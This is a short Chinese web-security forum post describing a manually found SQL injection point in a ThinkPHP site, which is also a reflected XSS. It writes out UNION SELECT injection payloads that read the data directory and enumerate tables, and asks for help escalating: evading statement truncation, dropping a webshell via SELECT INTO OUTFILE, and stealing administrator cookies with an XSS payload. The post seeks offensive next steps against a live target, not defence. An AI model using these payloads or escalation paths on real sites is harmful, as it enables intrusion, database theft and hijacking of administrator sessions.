thinkphp框架下mysql注入 - 网站安全 - 自学php

Wamp环境，用thinkphp框架制作，手工检测发现一个注入点。

/content/117 xand 1=2 union select @@datadir,2,3,4,5,6x

 

这个注入点同时还是一个反射型xss，id值被写入到了内联js里。

 

接着提交 and 1=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=(hex值) 返回空白，查看源代码发现].]之后的语句被截断了。

 

现在有几个思路，求指点 1.构造特殊语句，使语句中不出现].]。 2.通过Select into outfile导出webshell。但由于框架问题]/]和]\]都被认为是目录。 3.构造xss获取管理员cookies。

eg：/content/117;alert(document.cookie)

查看更多关于thinkphp框架下mysql注入 - 网站安全 - 自学php的详细内容...